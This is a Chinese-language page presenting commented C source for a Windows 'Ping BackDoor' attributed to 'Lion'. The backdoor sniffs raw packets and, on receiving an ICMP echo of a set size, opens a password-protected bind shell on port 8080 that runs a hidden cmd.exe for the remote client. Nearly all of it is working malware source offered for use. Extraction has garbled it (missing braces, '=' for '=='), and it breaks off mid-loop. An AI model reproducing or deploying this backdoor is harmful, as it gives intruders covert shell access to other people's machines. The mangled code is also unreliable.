包含詳細(xì)注釋的pingback后門(mén)C源代碼

1、#include <stdio.h> #include <stdlib.h> #include <winsock2.h> /#include <ws2tcpip.h> #include <mstcpip.h> #define ICMP_ECHO 8 / ICMP回顯請(qǐng)求報(bào)文的類(lèi)型值為8 #define ICMP_ECHOREPLY 0 / ICMP回顯應(yīng)答報(bào)文的類(lèi)型值為0 #define SNIFFER_ICMP_SIZE 101 / 監(jiān)聽(tīng)I(yíng)CMP包的大? #define BIND_PORT 8080 / 默認(rèn)bind shell 端

2、口 #define MAX_PACKET 10000 / 最大ICMP包的大? #define DEF_PASSWORD "givemeshell!" / 默認(rèn)密碼 #define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,(s) / 定義IP 首部 typedef struct iphdr unsigned char h_verlen; / 4位首部長(zhǎng)度,4位IP版本號(hào) 1 unsigned char tos; / 8位服務(wù)類(lèi)型TOS 1 unsigned short total_len; / 16位總

3、長(zhǎng)度(字節(jié)) 2 unsigned short ident; / 16位標(biāo)識(shí) 2 unsigned short frag_and_flags; / 3位標(biāo)志位 2 unsigned char ttl; / 8位生存時(shí)間 TTL 1 unsigned char proto; / 8位協(xié)議(TCP, UDP 或其它) 1 unsigned short checksum; / 16位IP首部校驗(yàn)和 2 unsigned int sourceIP; / 32位源IP地址 4 unsigned int destIP; / 32位目的IP地址 4 IPHeader; / IP首部長(zhǎng)度為： 20 / 定義I

4、CMP首部 typedef struct _ihdr unsigned char i_type; / 8位類(lèi)型 1 unsigned char i_code; / 8位代碼 1 unsigned short i_cksum; / 16位校驗(yàn)和 2 unsigned short i_id; / 識(shí)別號(hào)(用進(jìn)程號(hào)作為識(shí)別) 2 unsigned short i_seq; / 報(bào)文序列號(hào) 2 ICMPHeader; / ICMP首部長(zhǎng)度為： 8 int sniffer(); / 監(jiān)聽(tīng)I(yíng)CMP 大? void decode_sniffer(char *, int, struct sockaddr_in

5、 *); / 簡(jiǎn)單Sniffer 解包程序 int bindshell(); / bind shell DWORD dwBufferLen10; DWORD dwBufferInLen = 1; DWORD dwBytesReturned = 0; HANDLE bindthread; / ICMPDoor 主函數(shù) int main(int argc, char *argv) WSADATA wsaData; int retval; / socket 初始化 if (retval = WSAStartup(MAKEWORD(2,2), &wsaData) != 0) printf(&q

6、uot;WSAStartup failed: %dn",retval); exit(-1); / sniffer 開(kāi)始 sniffer(); / socket 結(jié)束 WSACleanup(); return 0; / sniffer 主函數(shù) int sniffer() int packsize = SNIFFER_ICMP_SIZE; SOCKET socksniffer; struct sockaddr_in dest,from; struct hostent * hp; int sread; int fromlen = sizeof(from); unsigned char Lo

7、calName256; char *recvbuf; / 創(chuàng)建一個(gè)原始socket, 接受所有接收的包(sniffer) if (socksniffer = WSASocket(AF_INET, SOCK_RAW, IPPROTO_IP, NULL, 0, WSA_FLAG_OVERLAPPED) = INVALID_SOCKET) printf("WSASocket() failed: %dn", WSAGetLastError(); return -1; / 取得本地地址 gethostname(char*)LocalName, sizeof(LocalName)-1)

8、; if(hp = gethostbyname(char*)LocalName) = NULL) return -1; memset(&dest,0,sizeof(dest); memcpy(&dest.sin_addr.s_addr, hp->h_addr_list0, hp->h_length); / TCP嗅探選項(xiàng) dest.sin_family = AF_INET; dest.sin_port = htons(8000); / 指定任意端口 / socket bind bind(socksniffer, (PSOCKADDR)&dest, sizeo

9、f(dest); / 設(shè)置socket為接受所有包 WSAIoctl(socksniffer, SIO_RCVALL, &dwBufferInLen, sizeof(dwBufferInLen), &dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL ); / 分配socket接收緩沖區(qū)大小為MAX_PACKET recvbuf = (char *)xmalloc(MAX_PACKET); printf("Sniffer ok!"); / 循環(huán)監(jiān)聽(tīng)包的大小 while(1)

10、/ 讀數(shù)據(jù) sread = recvfrom(socksniffer, recvbuf, MAX_PACKET, 0, (struct sockaddr*)&from, &fromlen); / 如果讀數(shù)據(jù)出錯(cuò) if (sread = SOCKET_ERROR | sread < 0) if (WSAGetLastError() = WSAETIMEDOUT) continue; printf("recvfrom failed: %dn",WSAGetLastError(); return -1; else / if ( sread >= 28)

11、 / 如果讀到數(shù)據(jù)的大小 = 監(jiān)聽(tīng)包的大小 + 28 if ( sread = packsize + 28) / 將接收到的數(shù)據(jù)交給 Sniffer 解包程序處理 decode_sniffer(recvbuf, sread - 28, &from); return 1; / 簡(jiǎn)單Sniffer 解包程序 void decode_sniffer(char *buf, int bytes, struct sockaddr_in *from) ICMPHeader *icmphdr; / ICMP首部的地址等于buf+IP首部長(zhǎng)度：buf+20 icmphdr = (ICMPHeader *

12、)(buf + sizeof(IPHeader); /* printf("rn %d bytes from %s,", bytes, inet_ntoa(from->sin_addr); / 取出接收數(shù)據(jù) printf(" ICMP_Type: %d", icmphdr->i_type); / 檢測(cè)類(lèi)型 printf(" ICMP_Seq: %drn", icmphdr->i_seq); / 取出序列號(hào) /?出數(shù)據(jù)段 buf + 28 + i for(int i = 0; i < bytes - 1; i+)

13、printf("%c", *(buf + sizeof(IPHeader) + sizeof(ICMPHeader) + i); */ / if (icmphdr->i_type = ICMP_ECHO | icmphdr->i_type = ICMP_ECHOREPLY) / 簡(jiǎn)單判斷如果為icmp 請(qǐng)求包 if (icmphdr->i_type = ICMP_ECHO) / bind shell bindshell(); / DWORD bid; / bindthread = CreateThread(NULL, 0, bindshell, 0, 0,

14、 &bid); else printf("rn Get Other Packets!"); return; / bind shell函數(shù) int bindshell() int bport = BIND_PORT; SOCKET bindServer, getClient; struct sockaddr_in addrServer, addrClient; char Buff4096; char *messages = "rn= Ping BackDoor V0.1 =rn= Code by Lion. Welcome to Http:/ =rn&quo

15、t; char *getpass = "rn Your PassWord:" char *passok = "rn OK! Please Enter:" char *nothispass = "rn Sorry, Your PassWord Not Right.rn" char *exitok = "rn Exit OK!rn" char *rebootok = "rn Reboot now!rn" / 創(chuàng)建一個(gè)socket bindServer = socket(AF_INET, SOCK_S

16、TREAM, IPPROTO_TCP); / 服務(wù)器地址和端口指定 addrServer.sin_family = AF_INET; addrServer.sin_port = htons(bport); addrServer.sin_addr.s_addr = ADDR_ANY; / 設(shè)置超時(shí) int TimeOut = 60000; setsockopt(bindServer, SOL_SOCKET, SO_RCVTIMEO, (char*)&TimeOut, sizeof(TimeOut); / 設(shè)置重復(fù)利用端口 UINT bReUser = 1; setsockopt(bind

17、Server, SOL_SOCKET, SO_REUSEADDR, (char*)&bReUser, sizeof(bReUser); / 監(jiān)聽(tīng)端口 bind(bindServer, (struct sockaddr*)&addrServer, sizeof(addrServer); listen(bindServer, 2); printf("rn Bind Port on %d ok.", bport); / 接受client連接 int iLen = sizeof(addrClient); / 接收1次連接 getClient = accept(bin

18、dServer, (struct sockaddr*)&addrClient, &iLen); if(getClient != INVALID_SOCKET) / 如果有連接進(jìn)來(lái)設(shè)置延時(shí)為60S int iTimeOut = 60000; setsockopt(getClient, SOL_SOCKET, SO_RCVTIMEO, (char*)&iTimeOut, sizeof(iTimeOut); else return -1; / 寫(xiě)歡迎信息 send(getClient, messages, strlen(messages), 0); / 寫(xiě)密碼驗(yàn)證信息 sen

19、d(getClient, getpass, strlen(getpass), 0); / 接收數(shù)據(jù) recv(getClient,Buff,1024,0); / 驗(yàn)證密碼 if(!(strstr(Buff, DEF_PASSWORD) / 如果密碼錯(cuò)誤,寫(xiě)密碼錯(cuò)誤信息 send(getClient, nothispass, strlen(nothispass), 0); printf("rn PassWord Not Right!"); closesocket(getClient); closesocket(bindServer); return -1; / 寫(xiě)通過(guò)驗(yàn)證信息

20、 send(getClient, passok, strlen(passok), 0); / 建兩個(gè)匿名管道 HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; unsigned long lBytesRead; SECURITY_ATTRIBUTES sa; sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipe(&hRe

21、adPipe2,&hWritePipe2,&sa,0); STARTUPINFO siinfo; char cmdLine = "cmd.exe" PROCESS_INFORMATION ProcessInformation; ZeroMemory(&siinfo,sizeof(siinfo); siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; / 讀socke

22、t寫(xiě)入pipe2的數(shù)據(jù) siinfo.hStdOutput = siinfo.hStdError = hWritePipe1; / 向這里寫(xiě)數(shù)據(jù) printf("rn Pipe Create OK!"); / 創(chuàng)建一個(gè)cmd進(jìn)程, 由hReadPipe2讀數(shù)據(jù),向hWritePipe1寫(xiě)數(shù)據(jù) int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); while(1) / 檢查管道是否有數(shù)據(jù)返回 int ret = PeekNamed

23、Pipe(hReadPipe1,Buff,1024,&lBytesRead,0,0); if(lBytesRead) / 從管道hReadPipe1讀數(shù)據(jù) ret = ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(!ret) break; / 把從管道hReadPipe1讀到的數(shù)據(jù)寫(xiě)入連接 getClient ret = send(getClient,Buff,lBytesRead,0); if(ret <= 0) break; else / 如果連接 getClient 有接收到數(shù)據(jù) lBytesRead = recv(getClient,Buff,1024,0); if(lBytesRead <= 0) brea